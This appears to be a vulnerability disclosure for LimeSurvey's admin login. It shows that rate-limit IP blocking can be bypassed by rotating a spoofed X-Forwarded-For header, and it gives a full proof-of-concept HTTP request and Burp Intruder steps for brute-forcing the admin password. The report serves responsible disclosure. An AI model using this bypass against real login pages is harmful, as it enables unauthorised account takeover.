Description

In login function, by default, the IP address will be blocked when the user tries to login incorrectly more than 3 times but we can bypass this mechanism by abuse X-Forwarded-For header to bypass IP dectection and perform password brute-force.

Proof of Concept

POST /LimeSurvey/index.php/admin/authentication/sa/login HTTP/1.1
Host: localhost:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
Origin: http://localhost:8888
Referer: http://localhost:8888/LimeSurvey/index.php/admin/authentication/sa/login
Cookie: PHPSESSID=4c6885df75ee21adc859130d344ad10e; LS-GXWBZDRRIABHCKHE=l0l8po0cduq9oqeek2pt7ciu13; YII_CSRF_TOKEN=RTQ0bk95WGFRd09CV3hYU1VDZG1scDBPMlRUTVRSZFO7ptHMioAExLZ4fFXUIL3VABaqXRYtFlMMEqdsdz3RCQ%3D%3D
X-Forwarded-For: 192.168.0.96
Sec-Fetch-User: ?1

YII_CSRF_TOKEN=RTQ0bk95WGFRd09CV3hYU1VDZG1scDBPMlRUTVRSZFO7ptHMioAExLZ4fFXUIL3VABaqXRYtFlMMEqdsdz3RCQ%3D%3D&authMethod=Authdb&user=admin&password=matrix&loginlang=default&action=login&width=1440&login_submit=login

Step to reproduce

1. Go to http:/<limesurvey.host>/index.php/admin/authentication/sa/login, here we will see a login form.
2. Enter any account like admin:admin and then intercept the request with Burp Suite and pass the request to the Intruder tab.
3. Add header X-Forwarded-For: 192.168.0.X.
4. Select attack type Pitchfork.
5. Set the position in the X-Forwarded-For header at X character and the password field
6. In the Payloads tab at the first position set payload type Numbers with range number from 1 to 100 and the second position import wordlist containing the list of passwords to be brute-forced.

PoC Image

As you can see, I have logged in 100 times (by default this action will be locked from the 4th time onwards),

and on the 98th request I have successfully logged in with the password in the dictionary.

Impact

This vulnerabiliy allow the attacker can perform bruteforce admin's password, perform deny of services attack, ...